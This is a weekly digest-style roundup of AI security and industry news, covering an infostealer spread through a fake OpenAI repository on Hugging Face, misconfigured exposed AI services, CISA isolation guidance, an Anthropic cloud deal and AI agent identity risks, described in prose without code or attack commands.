AI Attack Surface Expands , Your ERPs New Coworker , Critica

The TLDR IT digest from the week of May 11 is the clearest case yet that "AI security" is no longer a category — it is the operating environment.

What You Need to Know: A fake OpenAI repository on Hugging Face pushed an infostealer to 244,000 downloads before removal. A scan of 1M+ exposed AI services found weak defaults and misconfigurations across the board. CISA issued new guidance telling critical infrastructure operators to plan for isolation and recovery from cyberattacks before they happen. Anthropic signed a $1.8B deal with Akamai. And the "ERP has a new coworker" essay makes the case that SAP's new API policy is forcing agent builders into SFTP, email, and screen automation workarounds.

Why It Matters

• 244,000 downloads of a fake "OpenAI Privacy Filter" repo before it was pulled. The repository ranked #1 on Hugging Face for its target query. The malware targeted browser data, cryptocurrency wallets, and credentials, with anti-analysis techniques to evade detection. Hugging Face is now a primary malware distribution channel for AI-adjacent tooling — and the trust signals that worked for open source don't work here.
• 1M exposed AI services, mostly misconfigured. Researchers at The Hacker News scanned more than a million internet-exposed AI services and found weak defaults, public exposure, and unrotated credentials. AI infrastructure is being deployed with the same security posture as an experimental notebook — but it's connected to production data and customer-facing systems.
• CISA's new CI Fortify guidance reframes the resilience problem. Critical infrastructure operators are now being told to plan for isolation and recovery from cyberattacks before a crisis, not after. The assumption is no longer "we will detect and contain" — it is "we will be cut off, and we need to keep running."
• For builders: the IAM/agent identity problem is no longer a research paper. The Hacker News published a separate piece arguing that AI agents are already operating inside enterprise environments faster than identity and access management systems can track them. If you ship enterprise AI, the delegated authority problem is your problem.

What Actually Happened

Fake OpenAI repo on Hugging Face: 244K downloads

A malicious repository on Hugging Face, Open-OSS/privacy-filter, impersonated OpenAI and distributed Rust-based infostealer malware. The chain used JSON Keeper, scheduled tasks, and Defender exclusions to pull and run a stealer targeting wallets, Discord, browsers, and files, then exfiltrate the results. Linked repos and reused infrastructure tie the activity to ValleyRAT distribution previously seen with the trevlo npm package and Silver Fox operations. BleepingComputer's reporting notes the repository reached 244,000 downloads before removal. The standard remediation is full reimaging and credential rotation across every account that touched the infected environment. Hugging Face is now on the security team's review list for any developer pulling model weights.

1M exposed AI services, mostly misconfigured

The Hacker News covered research that scanned more than a million internet-exposed AI services and found weak defaults, misconfigurations, and public exposure. The pattern: AI infrastructure is being deployed like experimental software, but it is increasingly connected to real data and production systems. Researchers found model endpoints with default admin credentials, training data buckets open to the internet, and inference APIs exposing internal service metadata. The paper's argument: the security review checklist for AI infrastructure is fundamentally different from web app security, and most teams haven't updated their checklist.

CISA's CI Fortify guidance: plan to be cut off

CISA issued new CI Fortify guidance urging critical infrastructure operators to build isolation and recovery capabilities before a disruptive cyberattack. The assumption is that during a major incident, normal network paths, cloud services, and vendor support may be degraded. Operators need to know which systems must keep running, how to operate them with degraded tooling, and how to recover when the dust settles. The guidance is especially relevant for IT and security teams running systems where downtime translates directly to public safety risk. Poland's Internal Security Agency reported the same week that hackers breached five water treatment plants and gained control of industrial equipment.

Anthropic's $1.8B Akamai deal

Bloomberg reported that Anthropic signed a $1.8 billion cloud computing deal with Akamai to support growing demand for its AI software. The deal adds another signal that AI infrastructure demand is spilling beyond the usual hyperscaler relationships. Combined with the deals Anthropic struck or expanded with CoreWeave, Amazon, Google, Broadcom, and xAI in the same period, the company is now the largest independent buyer of compute capacity in the industry. The dependency cuts both ways: the labs need the cloud vendors more than the cloud vendors need any individual lab.

"Your ERP has a new coworker"

A Substack essay by CloudSquid argues that integrating AI agents with enterprise ERP systems via CLI and MCP protocols is harder than the demo videos suggest. AI agents need data access, code environments, and integration layers to automate ERP tasks. MCP offers structured tool discovery, but CLI is better for high-volume data movement. SAP's new API policy restricts third-party agents, forcing developers to use alternative integration methods — SFTP, email, and screen automation. The author's conclusion: enterprise AI agents are going to live in the integration gaps, not the official APIs, for the next 12–18 months at minimum.

The Take

Read these stories together and the pattern is obvious. The threat surface is moving from "people" to "agents." Fake model repos target developers. Exposed AI services target the infrastructure underneath those repos. ERP integrations are happening in SFTP and email because the official paths are blocked. Critical infrastructure is being told to plan for isolation because the perimeter is already gone. This is the same arc that web security went through in 2008–2014, compressed into 18 months.

The IAM problem is the one to watch. The Hacker News piece on enterprise AI identity is the most important read of the week. The argument: AI agents are already acting on behalf of users and systems, but they don't have proper identity primitives. They're being given OAuth tokens, service account credentials, and API keys — and those tokens don't expire, don't rotate, and aren't auditable. That's the same configuration error that caused the 2013 Target breach, scaled by a factor of a thousand.

For builders: the next 12 months of enterprise AI security work is going to be identity work. If you ship agent tooling, design for ephemeral credentials, per-action authorization, and audit logging that lets a CISO explain to a regulator what an agent did last Tuesday. The market for agentic identity primitives is going to look like the market for cloud identity primitives did in 2015 — and the winners will be the ones who ship first.

Quick Summary

A fake OpenAI repo on Hugging Face hit 244K downloads. A scan of 1M+ exposed AI services found systemic misconfiguration. CISA told critical infrastructure operators to plan for isolation. Anthropic signed $1.8B with Akamai. SAP's API restrictions are pushing ERP agent builders into SFTP and email.

Sources

• Fake OpenAI repository on Hugging Face pushes infostealer malware (BleepingComputer)
• Exposed AI Services Create a New Attack Surface (The Hacker News)
• CISA Tells Critical Infrastructure to Prepare for Isolation (Cybersecurity Dive)
• Enterprise AI Has an Identity Problem (The Hacker News)
• Anthropic Signs $1.8B Akamai Cloud Deal (Bloomberg)
• Your ERP Has a New Coworker (CloudSquid)